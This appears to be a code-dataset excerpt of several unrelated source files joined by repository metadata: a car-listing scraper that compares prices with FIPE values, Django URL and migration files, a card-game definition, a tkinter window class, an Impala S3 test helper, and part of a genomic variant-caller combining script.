return 'Not'
except:
return ''
def fipe_model(model_carr, fipe_json):
try:
for n in range(len(fipe_json)):
fipe_carr = fipe_json[n]['name']
#print(model_carr, fipe_carr)
if model_carr == fipe_carr:
return fipe_json[n]['id']
return 'Not'
except:
return ''
def search_data(links):
titles = []
prices = []
models = []
brands = []
yers = []
fuels = []
kms = []
directions = []
changes = []
types = []
poten = []
colors = []
doors = []
link_url = []
dates = []
c = 0
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--headless") #2
chrome_options.add_argument("--no-sandbox") #2
driver = webdriver.Chrome(executable_path='chromedriver', options=chrome_options)
for u in tqdm(links[:10]):
#print(c)
try:
            driver.get(url=u)
html = driver.page_source
soup = BeautifulSoup(html, 'html.parser')
title = soup.find("h1", {"class":"sc-1q2spfr-0 fSThqK sc-ifAKCX cmFKIN"})
price = soup.find("h2", {"class":"sc-1leoitd-0 cIfjkh sc-ifAKCX cmFKIN"})
date = soup.find("span", {"class":"sc-1oq8jzc-0 jvuXUB sc-ifAKCX fizSrB"})
content = soup.find("div", {"class":"sc-hmzhuo sc-1g2w54p-1 fEpzkb sc-jTzLTM iwtnNi"})
model = content.findAll("a")[0].text
brand = content.findAll("a")[3].text
yer = content.findAll("a")[4].text
fuel = content.findAll("a")[5].text
content2 = soup.findAll("span", {"class":"sc-ifAKCX cmFKIN"})
typy = apro(content2, list_types)
pote = apro(content2, list_poten)
direction = apro(content2, list_directions)
change = apro(content2, list_changes)
color = apro(content2, list_colors)
door = apro(content2, list_doors)
km = number(content2)
except:
titles.append("")
prices.append("")
models.append("")
brands.append("")
yers.append("")
fuels.append("")
types.append("")
poten.append("")
kms.append("")
directions.append("")
changes.append("")
colors.append("")
doors.append("")
link_url.append("")
dates.append("")
else:
titles.append(title.text)
prices.append(price.text)
models.append(model)
brands.append(brand)
yers.append(yer)
fuels.append(fuel)
types.append(typy)
poten.append(pote)
kms.append(km)
directions.append(direction)
changes.append(change)
colors.append(color)
doors.append(door)
link_url.append(u)
dates.append(date.text)
c += 1
matrix = {
'Titulo': titles,
'Preco': prices,
'Modelo': models,
'Fabricante': brands,
'Ano': yers,
'Combustivel': fuels,
'Tipo do Veiculo': types,
'Potencia': poten,
'Km Rodado': kms,
'Direção': directions,
'Cambio': changes,
'Cor': colors,
'Portas': doors,
'Link': link_url,
'Dates': dates
    }
    df = pd.DataFrame(data=matrix)
df['fipe'] = np.arange(len(df))
return df
def format_data(df):
for i in range(len(df)):
name_model = df['Modelo'][i]
name_brand = df['Fabricante'][i]
name_model = name_model.replace(name_brand + " ", "")
df['Modelo'][i] = name_model
        price_car = df['Preco'][i]
        try:
            # strip the currency symbol and all thousands separators, e.g. 'R$ 45.900' -> 45900
            price_car = price_car.replace("R$", "").replace(".", "").strip()
            df['Preco'][i] = int(price_car)
        except:
            df['Preco'][i] = ''
return df
def format_date(df):
for i in range(len(df)):
try:
            date_name = df['Dates'][i]  # e.g. 'Publicado em 19/06 às 15:57' ("published on 19/06 at 15:57")
date_name = date_name.split(" ")
day, month = date_name[2].split("/")
year = datetime.date.today().year
date_name = datetime.datetime(year, int(month), int(day), 0)
df['Dates'][i] = date_name
except:
df['Dates'][i] = ''
regra = datetime.timedelta(days=-1)
date_now = datetime.datetime.now()
date_regra = date_now + regra
date_regra = datetime.datetime(date_regra.year, date_regra.month, date_regra.day)
#print(date_regra)
return df, date_regra
def search_fipe(df):
marcas = requests.get('http://fipeapi.appspot.com/api/1/carros/marcas.json')
r_marcas = marcas.json()
c = 1
for i in tqdm(range(len(df))):
        # crude rate limiting: c grows by 3 per row, so pause after roughly 19 rows
        if c >= 57:
            c = 0
            time.sleep(45)
        name_model = df['Modelo'][i]
        name_brand = df['Fabricante'][i]
        fuel = df['Combustivel'][i]
        yer = df['Ano'][i]
        # note: the FIPE model key hardcodes 'Gasolina'; `fuel` is collected but unused here
        name_model_car = yer + ' ' + 'Gasolina'
try:
id_marca = int(fipe_brand(name_brand, r_marcas))
#df2['id_marca'][i] = id_marca
carros = requests.get(f'http://fipeapi.appspot.com/api/1/carros/veiculos/{id_marca}.json')
r_carros = carros.json()
id_carro = fipe_carr(name_model, r_carros)
#df2['id_carro'][i] = id_carro
modelo = requests.get(f'http://fipeapi.appspot.com/api/1/carros/veiculo/{id_marca}/{id_carro}.json')
r_modelo = modelo.json()
id_modelo = fipe_model(name_model_car, r_modelo)
#df2['id_modelo'][i] = id_modelo
fipe = requests.get(f'http://fipeapi.appspot.com/api/1/carros/veiculo/{id_marca}/{id_carro}/{id_modelo}.json')
r_fipe = fipe.json()
df['fipe'][i] = r_fipe['preco']
except:
#df2['id_marca'][i] = ''
#df2['id_carro'][i] = ''
#df2['id_modelo'][i] = ''
df['fipe'][i] = ''
c += 3
return df
def format_fipe(df):
df = df[df['fipe'] != '' ].reset_index(drop=True).fillna('0')
df = df[df['Preco'] != '' ].reset_index(drop=True).fillna('0')
for i in range(len(df)):
price_fipe = df['fipe'][i]
price_fipe = price_fipe.replace("R$ ", "")
price_fipe = price_fipe.replace(".", "")
price_fipe = price_fipe.split(",")
df['fipe'][i] = price_fipe[0]
df['fipe'] = df['fipe'].astype(int)
df['Preco'] = df['Preco'].astype(int)
df = df[df['fipe'] != 0].reset_index(drop=True)
df = df[df['Preco'] != 0].reset_index(drop=True)
return df
def rate(df):
rate = []
for i in range(len(df)):
price_fipe = df['fipe'][i]
price = df['Preco'][i]
if price_fipe > price:
v = ((price_fipe - price)/price_fipe)*100
rate.append(v)
else:
rate.append(0)
df['rate'] = rate
df['rate'] = df['rate'].astype(int)
return df
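
# Worked example (sketch): a listing with Preco=40000 and fipe=50000 gets
# rate = int((50000 - 40000) / 50000 * 100) = 20, i.e. 20% below the FIPE reference price.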
while True:
    links = search_links()
df = search_data(links)
df = format_data(df.copy())
df, start_date = format_date(df.copy())
df = search_fipe(df.copy())
df = format_fipe(df.copy())
df = rate(df.copy())
data = pd.read_csv('data.csv')
data = pd.concat([data, df], axis=0, ignore_index=True).reset_index(drop=True)
data = data.sort_values(by=['rate'], ascending=False)
data = data.drop_duplicates()
data['Dates'] = pd.to_datetime(data['Dates'])
data = data[(data['Dates'] > start_date)]
data.to_csv('data.csv', index=False) | [
"[email protected]"
] | |
99c959c4de418120bb052622993f89f76210342f | 30d5ea193ca3d73c2dfdf2528f92d5c396f93311 | /instapybc/urls.py | 1b63fe699dbbc02a7e134d8ee088642ea60675c4 | [] | no_license | udayRedI/instapy-backend | 0d696e6272ca0fbcdb63c9e97ea2de916d455a85 | d37ea01a0d37801140ab975639eadfff3dfc1647 | refs/heads/master | 2020-06-26T06:12:01.016554 | 2019-07-30T02:09:32 | 2019-07-30T02:09:32 | 199,556,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | """instapybc URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
4efd371132d1a0e5e0beaf8f40c49129ad27cf04 | 02ce998368c08bf5423d3b40165feab05dac4b21 | /server/cards/c0000000017.py | b4e0513ffab372fac0adc1dcc2f27210c5b2c5a1 | [] | no_license | zblcm/python-StoneAsh | 2e0f779a614d063b9a0bb2ef24e8199e9ddfd784 | d2d76a3be2cf93982288de2113a372683fd60336 | refs/heads/master | 2021-07-11T14:57:40.159292 | 2017-10-16T06:14:30 | 2017-10-16T06:14:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | from const import *
from buff import *
def init(self, mode = True):
self.name = "水元素"
self.description = "冻结受到该生物伤害的敌方生物。"
self.typ = CARD_CREATURE
self.subtype = [SUBTYPE_ELEMENT]
self.originalcost = [0, 0, 3, 0, 0, 0] #White Fire Water Tree Light Death
self.orimaxhealth = 4
self.oriattack = 1
self.maxattacktime = 1
if mode:
self.cost = self.originalcost.copy()
self.maxhealth = self.orimaxhealth
self.health = self.maxhealth
self.attack = self.oriattack
self.attacktime = 0
self.needtarget = False
buff = Buff(self.system, "nature_000000_auto", self, self)
self.add_buff(buff)
buff = Buff(self.system, "b0000000017_000", self, self)
self.add_buff(buff)
| [
"[email protected]"
] | |
99ad5aaa350a7200f74fb1bb86a0109da555bcc2 | 01e490a878999d01a3587b0b135ebb4d51cd61a4 | /Window/BaseWindow.py | a5abcc6c9cd2a89fe79ffed24643797b5e014839 | [] | no_license | Cyned/spotu | 977daf45ef83ac6c88be00b5596eb7c966afd17b | 1128e49b99ca54063c519d7f32cf755ffbf27cf6 | refs/heads/master | 2021-08-08T14:13:20.161886 | 2017-11-10T13:10:38 | 2017-11-10T13:10:38 | 110,248,328 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,315 | py | from tkinter import Tk
class BaseWindow(Tk):
def __init__(self, master=None):
super().__init__(master)
self._create_variables()
self._conf()
self._create_widgets()
self._create_layouts()
self._create_bindings()
def _create_variables(self):
"""
function to create base variables for the window
"""
        self.height = 500 if (self.winfo_screenheight() > 1000) else int(self.winfo_screenheight() / 3)
self.width = 500 if (self.winfo_screenwidth() > 1000) else int(self.winfo_screenwidth() / 3)
def _conf(self, *, title='window'):
"""
function to set the base settings of the window
"""
self.protocol('WM_DELETE_WINDOW', self.quit)
self.resizable(False, False)
self.config(bg='#000000')
self.geometry('{}x{}'.format(self.width, self.height))
self.title(title)
def _create_widgets(self):
"""
function to create base widgets for the window
"""
pass
def _create_layouts(self):
"""
function to create base layouts for the window
"""
pass
def _create_bindings(self):
"""
function to create base bindings for the window
"""
pass
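

# Example usage (sketch): subclass BaseWindow and override the _create_* hooks,
# or run the bare window directly.
if __name__ == '__main__':
    window = BaseWindow()
    window.mainloop()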
| [
"[email protected]"
] | |
6de6c68c8f1fe42715b7566ce5dc23c0173f980c | 0b7b017db9386b74d90ffe541878a756b0ed2976 | /contacts/migrations/0003_remove_contact_birthday.py | 87a7ea0df5de064f8dfd7390951bcae91657931d | [] | no_license | divanov11/contacts-list-with-django-backend | fe95e12bdcc54da535e5c4dc553d377603721d0e | 1ed8bb67ef202d9548e220a6d42203f5cc5dc0ef | refs/heads/master | 2023-02-16T09:33:56.469146 | 2021-01-11T00:07:18 | 2021-01-11T00:07:18 | 328,499,192 | 19 | 2 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | # Generated by Django 3.1.4 on 2021-01-10 22:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('contacts', '0002_auto_20210108_1420'),
]
operations = [
migrations.RemoveField(
model_name='contact',
name='birthday',
),
]
| [
"[email protected]"
] | |
9945a3bfa5b3ebae32c8982e01b0bb9c7954a926 | 6cf266ddd53df60e9361a23bb1924c38185eed9b | /tests/util/s3_util.py | 69d86545a945f64beb62439a9ab5935de5121a7b | [
"Apache-2.0"
] | permissive | jsoft88/Impala | f2d54c1fae7eaa4e783aa1f89c686f6901c1bd15 | 40c01a7f92d2248229e8e45291a1ef43b8c40f48 | refs/heads/cdh5-trunk | 2021-01-15T08:26:30.451304 | 2016-07-12T04:54:21 | 2016-08-02T11:53:20 | 65,306,967 | 0 | 0 | null | 2016-08-09T15:36:42 | 2016-08-09T15:36:41 | null | UTF-8 | Python | false | false | 3,844 | py | # Copyright (c) 2016 Cloudera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# S3 access utilities
#
# This file uses the boto3 client and provides simple functions to the Impala test suite
# to access Amazon S3.
import boto3
from tests.util.filesystem_base import BaseFilesystem
class S3Client(BaseFilesystem):
  def __init__(self, bucket):
self.bucketname = bucket
self.s3 = boto3.resource('s3')
self.bucket = self.s3.Bucket(self.bucketname)
self.s3client = boto3.client('s3')
def create_file(self, path, file_data, overwrite=True):
if not overwrite and self.exists(path): return False
self.s3client.put_object(Bucket=self.bucketname, Key=path, Body=file_data)
return True
def make_dir(self, path, permission=None):
# This function is a no-op. S3 is a key-value store and does not have a directory
    # structure. We can use a non-existent path as though it already exists.
pass
def copy(self, src, dst):
self.s3client.copy_object(Bucket=self.bucketname,
CopySource={'Bucket':self.bucketname, 'Key':src}, Key=dst)
# Since S3 is a key-value store, it does not have a command like 'ls' for a directory
# structured filesystem. It lists everything under a path recursively.
# We have to manipulate its response to get an 'ls' like output.
def ls(self, path):
if not path.endswith('/'):
path += '/'
# Use '/' as a delimiter so that we don't get all keys under a path recursively.
response = self.s3client.list_objects(
Bucket=self.bucketname, Prefix=path, Delimiter='/')
dirs = []
# Non-keys or "directories" will be listed as 'Prefix' under 'CommonPrefixes'.
if 'CommonPrefixes' in response:
dirs = [t['Prefix'] for t in response['CommonPrefixes']]
files = []
# Keys or "files" will be listed as 'Key' under 'Contents'.
if 'Contents' in response:
files = [t['Key'] for t in response['Contents']]
files_and_dirs = []
files_and_dirs.extend([d.split('/')[-2] for d in dirs])
for f in files:
key = f.split("/")[-1]
if not key == '':
files_and_dirs += [key]
return files_and_dirs
def get_all_file_sizes(self, path):
if not path.endswith('/'):
path += '/'
# Use '/' as a delimiter so that we don't get all keys under a path recursively.
response = self.s3client.list_objects(
Bucket=self.bucketname, Prefix=path, Delimiter='/')
if 'Contents' in response:
return [t['Size'] for t in response['Contents']]
return []
def exists(self, path):
response = self.s3client.list_objects(Bucket=self.bucketname,Prefix=path)
return response.get('Contents') is not None
# Helper function which lists keys in a path. Should not be used by the tests directly.
def _list_keys(self, path):
if not self.exists(path):
return False
response = self.s3client.list_objects(Bucket=self.bucketname, Prefix=path)
contents = response.get('Contents')
return [c['Key'] for c in contents]
def delete_file_dir(self, path, recursive=False):
if not self.exists(path):
return True
    objects = [{'Key': k} for k in self._list_keys(path)] if recursive else [{'Key': path}]
self.s3client.delete_objects(Bucket=self.bucketname, Delete={'Objects':objects})
return True
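
# Usage sketch (bucket and paths are hypothetical):
#   client = S3Client('impala-test-bucket')
#   client.create_file('test-warehouse/tmp/f.txt', 'data')
#   print(client.ls('test-warehouse/tmp'))
#   client.delete_file_dir('test-warehouse/tmp', recursive=True)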
| [
"[email protected]"
] | |
943782f14203b64efe4714db8a392c66edf59048 | 0aad4ba48f2fcdfbfac68db1dcf83592ad014141 | /docker-com/yuanqu/SystemManage/migrations/0001_initial.py | df47f8a2d76d41438e89e890f9506d919032b84b | [] | no_license | cauckfgf/fullstack | d55f5640df4c8c5917f0b23b405422975f347bef | e398797d23b2ef1afd3605f5600a9c4dae8efec8 | refs/heads/master | 2021-07-17T10:49:21.211777 | 2020-04-09T14:16:54 | 2020-04-09T14:16:54 | 123,122,968 | 1 | 3 | null | 2020-03-23T13:55:05 | 2018-02-27T11:59:44 | JavaScript | UTF-8 | Python | false | false | 1,265 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2019-06-25 04:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Config',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('config', models.TextField(blank=True, null=True)),
('appid', models.CharField(default='', max_length=64, verbose_name='\u5fae\u4fe1appid')),
('psw', models.CharField(default='', max_length=64, verbose_name='\u5fae\u4fe1\u516c\u4f17\u53f7\u5bc6\u7801')),
('yuming', models.CharField(default='', max_length=255, verbose_name='\u57df\u540d')),
('color', models.CharField(default='', max_length=255, verbose_name='\u989c\u8272')),
('front', models.CharField(default='', max_length=255, verbose_name='\u5b57\u4f53')),
],
options={
'verbose_name': '\u7cfb\u7edf\u914d\u7f6e',
'verbose_name_plural': '\u7cfb\u7edf\u914d\u7f6e',
},
),
]
| [
"[email protected]"
] | |
41cd82e5658b965f8dc84ee880167cd76fa6546c | 73e9c173e62e0821de2c1db4e5a29b613d4602e3 | /somaticseq/combine_callers.py | 155698472c3837fa9940e9d45b3dc0bcff3c9543 | [
"BSD-2-Clause"
] | permissive | wangdi2014/somaticseq | 388aed215d3ad1a8011ab429fc00a70154d67f4f | 32dcd8c8306041d3d18800f84fd7fdfc64c2a7f9 | refs/heads/master | 2020-03-26T20:49:06.597061 | 2018-08-17T22:04:19 | 2018-08-17T22:04:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,042 | py | #!/usr/bin/env python3
import sys, os, argparse, gzip, re, subprocess
MY_DIR = os.path.dirname(os.path.realpath(__file__))
PRE_DIR = os.path.join(MY_DIR, os.pardir)
sys.path.append( PRE_DIR )
import genomicFileHandler.genomic_file_handlers as genome
import vcfModifier.copy_TextFile as copy_TextFile
import vcfModifier.getUniqueVcfPositions as getUniqueVcfPositions
from vcfModifier.vcfIntersector import *
# Combine individual VCF output into a simple combined VCF file, for single-sample callers
def combineSingle(outdir, ref, bam, inclusion=None, exclusion=None, mutect=None, mutect2=None, varscan=None, vardict=None, lofreq=None, scalpel=None, strelka=None, keep_intermediates=False):
import vcfModifier.splitVcf as splitVcf
hg_dict = re.sub(r'\.fa(sta)?$', '.dict', ref)
intermediate_files = set()
snv_intermediates = []
indel_intermediates = []
intermediate_vcfs = {'MuTect2' :{'snv': None, 'indel': None}, \
'VarScan2' :{'snv': None, 'indel': None}, \
'VarDict' :{'snv': None, 'indel': None}, \
'LoFreq' :{'snv': None, 'indel': None}, \
'Strelka' :{'snv': None, 'indel': None}, }
if mutect:
import vcfModifier.modify_MuTect as mod_mutect
if exclusion:
mutect_ex = bed_exclude(mutect, exclusion, os.sep.join(( outdir, 'snv.mutect1.ex.vcf' )) )
intermediate_files.add(mutect_ex)
else:
mutect_ex = mutect
if inclusion:
mutect_in = bed_include(mutect_ex, inclusion, os.sep.join(( outdir, 'snv.mutect1.in.vcf')) )
intermediate_files.add(mutect_in)
else:
mutect_in = mutect_ex
snv_mutect_out = os.sep.join(( outdir, 'snv.mutect1.vcf' ))
mod_mutect.convert(mutect_in, snv_mutect_out, bam)
intermediate_files.add(snv_mutect_out)
snv_intermediates.append(snv_mutect_out)
if mutect2:
import vcfModifier.modify_ssMuTect2 as mod_mutect2
if exclusion:
mutect2_ex = bed_exclude(mutect2, exclusion, os.sep.join(( outdir, 'mutect.ex.vcf')) )
intermediate_files.add(mutect2_ex)
else:
mutect2_ex = mutect2
if inclusion:
mutect2_in = bed_include(mutect2_ex, inclusion, os.sep.join(( outdir, 'mutect.in.vcf')) )
intermediate_files.add(mutect2_in)
else:
mutect2_in = mutect2_ex
snv_mutect_out = os.sep.join(( outdir, 'snv.mutect.vcf' ))
indel_mutect_out = os.sep.join(( outdir, 'indel.mutect.vcf' ))
mod_mutect2.convert(mutect2_in, snv_mutect_out, indel_mutect_out)
for file_i in snv_mutect_out, indel_mutect_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_mutect_out)
indel_intermediates.append(indel_mutect_out)
intermediate_vcfs['MuTect2']['snv'] = snv_mutect_out
intermediate_vcfs['MuTect2']['indel'] = indel_mutect_out
if varscan:
import vcfModifier.modify_VarScan2 as mod_varscan2
if exclusion:
varscan_ex = bed_exclude(varscan, exclusion, os.sep.join(( outdir, 'varscan.ex.vcf')) )
intermediate_files.add(varscan_ex)
else:
varscan_ex = varscan
if inclusion:
varscan_in = bed_include(varscan_ex, inclusion, os.sep.join(( outdir, 'varscan.in.vcf')) )
intermediate_files.add(varscan_in)
else:
varscan_in = varscan_ex
snv_temp = os.sep.join(( outdir, 'snv.varscan.temp.vcf' ))
indel_temp = os.sep.join(( outdir, 'indel.varscan.temp.vcf' ))
snv_varscan_out = os.sep.join(( outdir, 'snv.varscan.vcf' ))
indel_varscan_out = os.sep.join(( outdir, 'indel.varscan.vcf' ))
splitVcf.split_into_snv_and_indel(varscan_in, snv_temp, indel_temp)
mod_varscan2.convert(snv_temp, snv_varscan_out)
mod_varscan2.convert(indel_temp, indel_varscan_out)
for file_i in snv_temp, indel_temp, snv_varscan_out, indel_varscan_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_varscan_out)
indel_intermediates.append(indel_varscan_out)
intermediate_vcfs['VarScan2']['snv'] = snv_varscan_out
intermediate_vcfs['VarScan2']['indel'] = indel_varscan_out
if vardict:
import vcfModifier.modify_VarDict as mod_vardict
if exclusion:
vardict_ex = bed_exclude(vardict, exclusion, os.sep.join(( outdir, 'vardict.ex.vcf')) )
intermediate_files.add(vardict_ex)
else:
vardict_ex = vardict
if inclusion:
vardict_in = bed_include(vardict_ex, inclusion, os.sep.join(( outdir, 'vardict.in.vcf')) )
intermediate_files.add(vardict_in)
else:
vardict_in = vardict_ex
snv_vardict_out = os.sep.join(( outdir, 'snv.vardict.vcf' ))
indel_vardict_out = os.sep.join(( outdir, 'indel.vardict.vcf'))
mod_vardict.convert(vardict_in, snv_vardict_out, indel_vardict_out)
sorted_snv_vardict_out = os.sep.join(( outdir, 'snv.sort.vardict.vcf'))
sorted_indel_vardict_out = os.sep.join(( outdir, 'indel.sort.vardict.vcf'))
vcfsorter(ref, snv_vardict_out, sorted_snv_vardict_out)
vcfsorter(ref, indel_vardict_out, sorted_indel_vardict_out)
for file_i in snv_vardict_out, indel_vardict_out, sorted_snv_vardict_out, sorted_indel_vardict_out:
intermediate_files.add( file_i )
snv_intermediates.append(sorted_snv_vardict_out)
indel_intermediates.append(sorted_indel_vardict_out)
intermediate_vcfs['VarDict']['snv'] = sorted_snv_vardict_out
intermediate_vcfs['VarDict']['indel'] = sorted_indel_vardict_out
if lofreq:
if exclusion:
lofreq_ex = bed_exclude(lofreq, exclusion, os.sep.join(( outdir, 'lofreq.ex.vcf')) )
intermediate_files.add(lofreq_ex)
else:
lofreq_ex = lofreq
if inclusion:
lofreq_in = bed_include(lofreq_ex, inclusion, os.sep.join(( outdir, 'lofreq.in.vcf')) )
intermediate_files.add(lofreq_in)
else:
lofreq_in = lofreq_ex
snv_lofreq_out = os.sep.join(( outdir, 'snv.lofreq.vcf' ))
indel_lofreq_out = os.sep.join(( outdir, 'indel.lofreq.vcf' ))
splitVcf.split_into_snv_and_indel(lofreq_in, snv_lofreq_out, indel_lofreq_out)
for file_i in snv_lofreq_out, indel_lofreq_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_lofreq_out)
indel_intermediates.append(indel_lofreq_out)
        intermediate_vcfs['LoFreq']['snv'] = snv_lofreq_out
        intermediate_vcfs['LoFreq']['indel'] = indel_lofreq_out
if scalpel:
if exclusion:
scalpel_ex = bed_exclude(scalpel, exclusion, os.sep.join(( outdir, 'scalpel.ex.vcf')) )
intermediate_files.add(scalpel_ex)
else:
scalpel_ex = scalpel
if inclusion:
scalpel_in = bed_include(scalpel_ex, inclusion, os.sep.join(( outdir, 'scalpel.in.vcf')) )
intermediate_files.add(scalpel_in)
else:
scalpel_in = scalpel_ex
scalpel_out = os.sep.join(( outdir, 'indel.scalpel.vcf' ))
copy_TextFile.copy(scalpel_in, scalpel_out)
intermediate_files.add(scalpel_out)
indel_intermediates.append(scalpel_out)
if strelka:
import vcfModifier.modify_ssStrelka as mod_strelka
if exclusion:
strelka_ex = bed_exclude(strelka, exclusion, os.sep.join(( outdir, 'strelka.ex.vcf')) )
intermediate_files.add(strelka_ex)
else:
strelka_ex = strelka
if inclusion:
strelka_in = bed_include(strelka_ex, inclusion, os.sep.join(( outdir, 'strelka.in.vcf')) )
intermediate_files.add(strelka_in)
else:
strelka_in = strelka_ex
snv_strelka_out = os.sep.join(( outdir, 'snv.strelka.vcf' ))
indel_strelka_out = os.sep.join(( outdir, 'indel.strelka.vcf' ))
mod_strelka.convert(strelka_in, snv_strelka_out, indel_strelka_out)
for file_i in snv_strelka_out, indel_strelka_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_strelka_out)
indel_intermediates.append(indel_strelka_out)
intermediate_vcfs['Strelka']['snv'] = snv_strelka_out
intermediate_vcfs['Strelka']['indel'] = indel_strelka_out
# Combine SNV/INDEL variant candidates
snv_combined = os.sep.join(( outdir, 'unsorted.CombineVariants.snv.vcf' ))
indel_combined = os.sep.join(( outdir, 'unsorted.CombineVariants.indel.vcf' ))
getUniqueVcfPositions.combine(snv_intermediates, snv_combined)
getUniqueVcfPositions.combine(indel_intermediates, indel_combined)
for file_i in snv_combined, indel_combined:
intermediate_files.add( file_i )
# Sort them:
snv_combined_sorted = os.sep.join(( outdir, 'CombineVariants.snv.vcf' ))
indel_combined_sorted = os.sep.join(( outdir, 'CombineVariants.indel.vcf' ))
vcfsorter(ref, snv_combined, snv_combined_sorted)
vcfsorter(ref, indel_combined, indel_combined_sorted)
if not keep_intermediates:
for file_i in intermediate_files:
subprocess.call( ('rm', '-v', file_i ) )
return snv_combined_sorted, indel_combined_sorted, intermediate_vcfs, intermediate_files
# Combine individual VCF output into a simple combined VCF file, for paired sample callers
def combinePaired(outdir, ref, tbam, nbam, inclusion=None, exclusion=None, mutect=None, indelocator=None, mutect2=None, varscan_snv=None, varscan_indel=None, jsm=None, sniper=None, vardict=None, muse=None, lofreq_snv=None, lofreq_indel=None, scalpel=None, strelka_snv=None, strelka_indel=None, tnscope=None, keep_intermediates=False):
hg_dict = re.sub(r'\.fa(sta)?$', '.dict', ref)
intermediate_files = set()
snv_intermediates = []
indel_intermediates = []
intermediate_vcfs = {'MuTect2':{'snv': None, 'indel': None}, \
'VarDict':{'snv': None, 'indel': None}, \
'TNscope':{'snv': None, 'indel': None}, }
# Modify direct VCF outputs for merging:
if mutect or indelocator:
import vcfModifier.modify_MuTect as mod_mutect
if mutect:
if exclusion:
mutect_ex = bed_exclude(mutect, exclusion, os.sep.join(( outdir, 'snv.mutect1.ex.vcf')) )
intermediate_files.add(mutect_ex)
else:
mutect_ex = mutect
if inclusion:
mutect_in = bed_include(mutect_ex, inclusion, os.sep.join(( outdir, 'snv.mutect1.in.vcf')) )
intermediate_files.add(mutect_in)
else:
mutect_in = mutect_ex
snv_mutect_out = os.sep.join(( outdir, 'snv.mutect1.vcf' ))
mod_mutect.convert(mutect_in, snv_mutect_out, tbam, nbam)
intermediate_files.add(snv_mutect_out)
snv_intermediates.append(snv_mutect_out)
if indelocator:
if exclusion:
indelocator_ex = bed_exclude(indelocator, exclusion, os.sep.join(( outdir, 'indel.indelocator.ex.vcf')) )
intermediate_files.add(indelocator_ex)
else:
indelocator_ex = indelocator
if inclusion:
indelocator_in = bed_include(indelocator_ex, inclusion, os.sep.join(( outdir, 'indel.indelocator.in.vcf')) )
intermediate_files.add(indelocator_in)
else:
indelocator_in = indelocator_ex
indel_indelocator_out = os.sep.join(( outdir, 'indel.indelocator.vcf'))
mod_mutect.convert(indelocator_in, indel_indelocator_out, tbam, nbam)
intermediate_files.add(indel_indelocator_out)
indel_intermediates.append(indel_indelocator_out)
if mutect2:
import vcfModifier.modify_MuTect2 as mod_mutect2
if exclusion:
mutect2_ex = bed_exclude(mutect2, exclusion, os.sep.join(( outdir, 'mutect.ex.vcf')) )
intermediate_files.add(mutect2_ex)
else:
mutect2_ex = mutect2
if inclusion:
mutect2_in = bed_include(mutect2_ex, inclusion, os.sep.join(( outdir, 'mutect.in.vcf')) )
intermediate_files.add(mutect2_in)
else:
mutect2_in = mutect2_ex
snv_mutect_out = os.sep.join(( outdir, 'snv.mutect.vcf'))
indel_mutect_out = os.sep.join(( outdir, 'indel.mutect.vcf'))
mod_mutect2.convert(mutect2_in, snv_mutect_out, indel_mutect_out, False)
for file_i in snv_mutect_out, indel_mutect_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_mutect_out)
indel_intermediates.append(indel_mutect_out)
intermediate_vcfs['MuTect2']['snv'] = snv_mutect_out
intermediate_vcfs['MuTect2']['indel'] = indel_mutect_out
if varscan_snv or varscan_indel:
import vcfModifier.modify_VarScan2 as mod_varscan2
if varscan_snv:
if exclusion:
varscan_ex = bed_exclude(varscan_snv, exclusion, os.sep.join(( outdir, 'snv.varscan.ex.vcf')) )
intermediate_files.add(varscan_ex)
else:
varscan_ex = varscan_snv
if inclusion:
varscan_in = bed_include(varscan_ex, inclusion, os.sep.join(( outdir, 'snv.varscan.in.vcf')) )
intermediate_files.add(varscan_in)
else:
varscan_in = varscan_ex
snv_varscan_out = os.sep.join(( outdir, 'snv.varscan.vcf'))
mod_varscan2.convert(varscan_in, snv_varscan_out)
intermediate_files.add(snv_varscan_out)
snv_intermediates.append(snv_varscan_out)
if varscan_indel:
if exclusion:
varscan_ex = bed_exclude(varscan_indel, exclusion, os.sep.join(( outdir, 'indel.varscan.ex.vcf')) )
intermediate_files.add(varscan_ex)
else:
varscan_ex = varscan_indel
if inclusion:
varscan_in = bed_include(varscan_ex, inclusion, os.sep.join(( outdir, 'indel.varscan.in.vcf')) )
intermediate_files.add(varscan_in)
else:
varscan_in = varscan_ex
indel_varscan_out = os.sep.join(( outdir, 'indel.varscan.vcf' ))
mod_varscan2.convert(varscan_in, indel_varscan_out)
intermediate_files.add(indel_varscan_out)
indel_intermediates.append(indel_varscan_out)
if jsm:
import vcfModifier.modify_JointSNVMix2 as mod_jsm
if exclusion:
jsm_ex = bed_exclude(jsm, exclusion, os.sep.join(( outdir, 'snv.jsm.ex.vcf')) )
intermediate_files.add(jsm_ex)
else:
jsm_ex = jsm
if inclusion:
